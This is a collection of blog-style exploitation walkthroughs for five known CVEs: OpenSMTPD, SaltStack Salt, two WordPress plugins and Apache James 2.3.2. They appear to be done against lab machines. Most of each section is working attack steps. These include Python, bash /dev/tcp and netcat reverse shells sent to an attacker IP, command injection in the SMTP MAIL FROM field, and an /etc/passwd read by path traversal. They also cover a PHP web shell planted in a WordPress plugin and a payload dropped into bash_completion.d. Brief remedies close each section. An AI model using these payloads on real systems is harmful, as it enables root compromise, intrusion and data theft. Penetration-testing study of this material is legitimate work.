OpenSMTPD < 6.6.1 - Remote Code Execution (smtp_mailaddr) - CVE-2020-7247

by Vry4n_ | May 24, 2022 | Linux Exploitation

OpenSMTPD could allow a remote attacker to gain elevated privileges on the system, caused by improper handling of user input. By sending a specially-crafted mail request, an attacker could exploit this vulnerability to execute arbitrary code on the system as root.

smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation.

Affected Products

• OpenSMTPD OpenSMTPD 6.4.0
• OpenSMTPD OpenSMTPD 6.4.1
• OpenSMTPD OpenSMTPD 6.4.2
• OpenSMTPD OpenSMTPD 6.6.0
• OpenSMTPD OpenSMTPD 6.6.1

Identify

1. Running a vulnerability scanner against the remote vulnerable server, in this case we are using Nessus

2. We can also Identify this vulnerability using Nmap, in this case the smtp version is 2.0.0

• nmap -p 25 --script smtp-commands 192.168.161.71

Exploitation Script

1. Knowing the service version, we can try to exploit this service, using an automated exploit (https://www.exploit-db.com/exploits/47984)

• searchsploit smtpd
• searchsploit -m linux/remote/47984.py

2. This exploit will allow us to execute remote code, first make sure it is executable, otherwise, assign execute permissions

• ls -l 47984.py
• (OPTIONAL) chmod 777 47984.py

3. Since, we are allowed to run commands we will first Ping test back to our machine. So first start a TCPdump listener waiting for ICMP traffic

• sudo tcpdump -i tun0 icmp and src 192.168.161.71

4. Now, execute the exploit, and point the ping command to our local machine

• python 47984.py 192.168.161.71 25 'ping -c 4 192.168.49.161'

5. Check the capture, and, confirm it captured ICMP traffic

6. We should proceed with trying to access the server, I’ll try a reverse shell to port 80, because, after testing this server didn’t allow any other port

• nc -lvp 80

7. Run the exploit with the reverse shell query, I’ll use python

• python 47984.py 192.168.161.71 25 'python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.49.161\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")"'

7. Now, check the listener, we should have a new session

• whoami

Exploitation Manual

1. In order to exploit manually, we need to connect to the STMP service using telnet

• telnet 192.168.161.71 25

2. Since we will do a ping test we will start a capture on our local machine

• sudo tcpdump -i tun0 icmp and src 192.168.161.71

3. In the SMTP session run the following commands (note the return code should be 250)

• HELO x
• MAIL FROM:<;ping -c 4 192.168.49.161;>
• RCPT TO:<root>
• DATA
• <enter>
• vry4n
• .
• QUIT

4. Look at the capture, we should now see some output

5. Instead of the ping command, you can run any other commands like a reverse shell, or create new users, as this is run as root

Remedy

Upgrade to the latest version of OpenSMTPD (6.6.2 or later)

Resources

https://exchange.xforce.ibmcloud.com/vulnerabilities/175213

https://seclists.org/bugtraq/2020/Jan/40

https://packetstormsecurity.com/files/156137

https://nvd.nist.gov/vuln/detail/CVE-2020-7247

SaltStack Salt REST API Arbitrary Command Execution (CVE-2020-11651, CVE-2020-11652)

by Vry4n_ | Mar 30, 2022 | Linux Exploitation

The Salt system is a Python-based, open-source remote execution framework for configuration management, automation, provisioning, and orchestration.

Running commands on remote systems is the core function of Salt. Salt can execute multiple commands across thousands of systems in seconds with a single execution.

https://saltproject.io/

https://docs.saltproject.io/salt/user-guide/en/latest/topics/overview.html

https://docs.saltproject.io/en/latest/topics/about_salt_project.html#about-salt

CVE-2020-11651

An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.

CVE-2020-11652

An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.

Affected Products

• SaltStack Salt 2019.2.3
• SaltStack Salt 3000.1
• Cisco Modeling Labs Corporate Edition (CML)
• Cisco TelePresence IX5000 Series
• Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE)

Enumeration

1. This vulnerability is present before the version 3000.1. We will enumerate this service, first I noticed an API site exposed

• http://192.168.71.62:8000/

2. In order to examine the version I ran I curl command and sent a HTTP request, to check upon the response header. I noticed “X-Upstream: salt-api/3000-1”

• curl -v http://192.168.71.62:8000/

Exploitation

1. Knowing this API is SaltStack we can proceed to look for exploits, I found this one that worked really well

• https://github.com/jasperla/CVE-2020-11651-poc

2. We will proceed to download the exploit, and install the required libraries (salt)

• git clone https://github.com/jasperla/CVE-2020-11651-poc.git
• sudo pip3 install salt
• cd CVE-2020-11651-poc
• ls

3. now we proceed to execute the exploit.py file, we will execute the help toption

• python3 exploit.py -h

4. Now we will proceed, to execute the program as a test. If we get the “root key” it means it is working without issues

• python3 exploit.py --master 192.168.71.62

5. Now I will run a test command, I’ll run a ping command and capture it with TCPDump (this will only execute in the master, if you need to execute into all the minion server use --exec-all)

Packet Capture

• sudo tcpdump -i tun0

Command execution

• python3 exploit.py --master 192.168.71.62 --exec "ping -c 4 192.168.49.71"

Output in packet capture

6. At this point we know that we can execute commands and we have connectivity back to our local machine. Now I will start a listener, and, execute a bash reverse shell

Listener

• nc -lvp 4505

Reverse Shell

• python3 exploit.py --master 192.168.71.62 --exec "bash -i >& /dev/tcp/192.168.49.71/4505 0>&1"

Final result, (reverse shell)

• whoami && date && hostname

Optional

1. We can upload files, and, read them to verify

• echo "Vry4n was here" > sample.txt
• python3 exploit.py --master 192.168.71.62 --upload-src sample.txt --upload-dest ../../../../../../../../tmp/sample.txt
• python3 exploit.py --master 192.168.71.62 -r "/tmp/sample.txt"

2. We can also read files using (-r)

• python3 exploit.py --master 192.168.71.62 -r "/etc/passwd"

Remedy

Upgrade to the latest version of Salt (2019.2.4, 3000.2 or later), available from the SALTSTACK Web site.

Resources

https://exchange.xforce.ibmcloud.com/vulnerabilities/181316

https://exchange.xforce.ibmcloud.com/vulnerabilities/181317

https://github.com/saltstack/salt/blob/v3000.2_docs/doc/topics/releases/3000.2.rst

https://www.exploit-db.com/exploits/48421

https://docs.saltproject.io/en/latest/topics/releases/2019.2.4.html

https://packetstormsecurity.com/files/157560

https://github.com/dozernz/cve-2020-11651

https://github.com/jasperla/CVE-2020-11651-poc

https://github.com/rossengeorgiev/salt-security-backports

WordPress Plugin User Role Editor < 4.24 - Privilege Escalation

by Vry4n_ | Mar 1, 2021 | Linux Exploitation

WordPress Plugin User Role Editor is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to perform otherwise restricted actions by gaining administrator access. WordPress Plugin User Role Editor version 4.24 is vulnerable; prior versions may also be affected.

The WordPress User Role Editor plugin prior to v4.25, is lacking an authorization check within its update user profile functionality ("update" function, contained within the "class-user-other-roles.php" module). Instead of verifying whether the current user has the right to edit other users' profiles ("edit_users" WP capability), the vulnerable function verifies whether the current user has the rights to edit the user ("edit_user" WP function) specified by the supplied user id ("user_id" variable/HTTP POST parameter). Since the supplied user id is the current user's id, this check is always bypassed (i.e. the current user is always allowed to modify its profile).

This vulnerability allows an authenticated user to add arbitrary User Role Editor roles to its profile, by specifying them via the "ure_other_roles" parameter within the HTTP POST request to the "profile.php" module (issued when "Update Profile" is clicked).

By default, this module grants the specified WP user all administrative privileges, existing within the context of the User Role Editor plugin.

Exploit

1. In the main menu go to

• Users - Your Profile

2. Capture web traffic using a proxy, I’d use BurpSuite, and then, click on Update Profile

3. Add &ure_other_roles=administrator to the end of the POST data, and then forward the request and follow the redirects.

• &ure_other_roles=administrator

4. When the page reloads in your browser, we should have a lot more options available to us in the menu. And our user showing administrator rights. Before it only had “Help Desk”

5. Administrator users can then modify PHP code on the site (through themes or plugins) and insert a reverse shell connection payload.

6. Start a netcat listener in the attacking machine

• nc -lvp 5555

7. Now in WordPress having the administrator rights go to

• Plugins - Plugin editor

8. Inject PHP code to any of the plugins’ code. Id modify “Hello Dolly”. I will use the webshell that comes with kali, just edit the remote address and the port

• /usr/share/webshells/php/ php-reverse-shell.php

9. Now execute that code by visiting the hello.php script in /wp-content/plugins/hello.php

• http://wordy/wp-content/plugins/hello.php

10. Check listener you should get a connection back.

• whoami; hostname; date

Remediation

Update to plugin version 4.25 or latest

WordPress Plugin: Plainview Activity Monitor – (Authenticated) Command Injection – CVE-2018-15877

by Vry4n_ | Feb 28, 2021 | Linux Exploitation

Plainview Activity Monitor plugin for WordPress could allow a remote authenticated attacker to execute arbitrary commands on the system. By sending a specially-crafted request, an attacker could exploit this vulnerability using shell metacharacters in the ip parameter to inject and execute arbitrary OS commands on the system.

The Plainview Activity Monitor plugin before 2018/08/26 for WordPress is vulnerable to OS command injection via shell metacharacters in the ip parameter of a wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools request.

More details

https://nvd.nist.gov/vuln/detail/CVE-2018-15877

https://exchange.xforce.ibmcloud.com/vulnerabilities/148904

https://packetstormsecurity.com/files/155502/WordPress-Plainview-Activity-Monitor-20161228-Remote-Command-Execution.html

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15877

https://www.exploit-db.com/exploits/45274

Exploit

1. This is an authenticated exploit, so, we need to have WordPress username & password. I brute forced, and got my way into.

• http://wordy/wp-login.php
• mark / helpdesk01

2. Within the menu go to

• Activity monitor - tools
• /wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools

3. Now fill the IP box and click on Lookup, capture this request using a web proxy. I’ll be using BurpSuite

4. Now we need to inject a Linux command within that “ip” parameter, we can use “|;&” since, these metacharacters have a meaning to the OS

5. Before we forward the crafted request, start a listener on the offensive machine

• nc -lvp 9999

6. After forwarding the request, we immediately get a reverse connection in our machine from the remote WordPress server

• whoami

Remedy

Upgrade to the latest version of Plainview Activity Monitor plugin (20180826 or later), available from the WordPress Plugins Directory.

Apache James Server 2.3.2 – CVE-2015-7611

by Vry4n_ | Feb 24, 2021 | Linux Exploitation

Apache James is a mail and news server and software framework written in Java. A bug in version 2.3.2 enables an attacker to execute arbitrary commands on the machine running the server.

The vulnerability arises from an insecure default configuration and a lack of input validation in the server's user creation mechanism; it allows an attacker to inject commands to execute when a user signs into the machine. Despite the vulnerability, a number of techniques can be employed to reduce the machine's attack surface and mitigate the risk of a compromise.

https://exchange.xforce.ibmcloud.com/vulnerabilities/99535

https://www.exploit-db.com/exploits/35513

https://seclists.org/bugtraq/2015/Sep/142

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7611

https://www.cvedetails.com/cve/CVE-2015-7611/

https://www.rapid7.com/db/modules/exploit/linux/smtp/apache_james_exec/

Exploitation

1. Scan to verify the version of the services running

• nmap -p- -A -sV -sC 192.168.0.10

2. Log in using defaults

By default, the Apache James administrator has the same username and password, "root." Using these credentials gives us access to the administration console, where we can create new users with the "adduser" command.

• telnet 192.168.0.10 4555
• root/root

3. Create an Exploitable User

The format of the command is "adduser <username> <password>," where "<username>" represents the username to be created, and "<password>" represents the user's password. To gain the ability to put files in "/etc/bash_completion.d," we create a mail user with the username "../../../../../../../../etc/bash_completion.d" with the command:

• listusers
• adduser ../../../../../../../../etc/bash_completion.d password
• listusers

Note:

Bash completion is a functionality through which bash helps users type their commands faster and easier. It accomplishes that by presenting possible options when users press the tab key while typing a command.

The completion script is code that uses the builtin bash command complete to define which completion suggestions can be displayed for a given executable. The nature of the completion options vary from simple static to highly sophisticated.

4. Being there as root admin, we can also, restart users mail passwords

• listusers
• setpassword mindy vpassword

5. Having access to the users’ mail, we can further exploit this vulnerability. First of all, let’s try to read the users emails, lets connect to POP3 (110)

• telnet 192.168.0.10 110
• USER mindy
• PASS vpassword
• LIST
• RETR 2

6. Now, we will send a special email message, from our compromised email address, to the newly created account, that will execute once, the user logs in. This is done via SMTP (25)

• telnet 192.168.0.25
• HELO mindy
• MAIL FROM: <’mindy@localhost>
• RCPT TO: <../../../../../../../../etc/bash_completion.d>
• DATA
• From: mindy@localhost
• ‘
• hostname | nc 192.168.0.13 3333
• .

7. Now at the attacking machine start a netcat listener, once, the user logs in we can see the remote command displayed in the local machine

• nc -lvp 3333 -o out

8. Now that we ran the remote command we can try to inject a bash reverse shell. So, when the user logs in, we receive a direct connection

• telnet 192.168.0.25
• HELO mindy
• MAIL FROM: <’mindy@localhost>
• RCPT TO: <../../../../../../../../etc/bash_completion.d>
• DATA
• From: mindy@localhost
• ‘
• nc -e /bin/bash 192.168.0.13 6666
• .
• quit

8. Start a netcat listener on our machine, and wait for the user to log in

• nc -lvp 6666

Alternative Exploitation

1. We have an automated method of exploiting this using a python script (https://www.exploit-db.com/exploits/35513)

• searchsploit james 2.3.2
• searchsploit -m linux/remote/35513.py

2. Now edit the file, and, add the command you want to run. In this case, I’d update the payload to run a netcat reverse connection

• vi 35513.py
• payload = 'nc -e /bin/bash 192.168.0.13 7777'

3. Run a netcat listener

• nc -lvp 7777

4. Run the python script

• python 35513.py 192.168.0.10

5. Wait for someone to log in

Remedy

Upgrade to the latest version of James Server (2.3.2.1 or later)

Recommendations

Change the Root Password

The root password can be set through the administration console. Changing the password makes an attack more time-consuming by increasing the effort required to gain access.

• telnet 192.168.0.10 4555
• root/root
• setpassword root <newpassword>

Restrict Access to the Administration Console

To limit the attack surface, the administration console should only be accessible from the local machine or from a whitelist of IP ranges, such as those on an internal network. These restrictions are effective because they require the attacker to devise an alternate means of accessing the machine.

Uninstall Bash-Completion

The vulnerability cannot be exploited as described without the presence of Bash-completion on the mail server machine. Though there are other executable paths on the system, e.g. "/etc/rc.d," removing Bash-completion decreases an attacker's options and increases the effort required to exploit the machine

Run the Server as an Unprivileged User

Running the server as an unprivileged user is the most effective of the techniques described here. The default configuration lends the server to run as the root user due to the need to bind to port 25, a privileged port. Choosing a port above 1023 removes this restriction and allows us to run the server as an unprivileged user and on an unprivileged port. To continue serving SMTP requests on port 25, the firewall can forward requests to the new, unprivileged port. In this mode, the server is limited in its use of system resources. An attacker trying to create an exploitable user will fail because the server can no longer alter the contents of "/etc/bash_completion.d."

Sources

https://crimsonglow.ca/~kjiwa/2016/06/exploiting-apache-james-2.3.2.html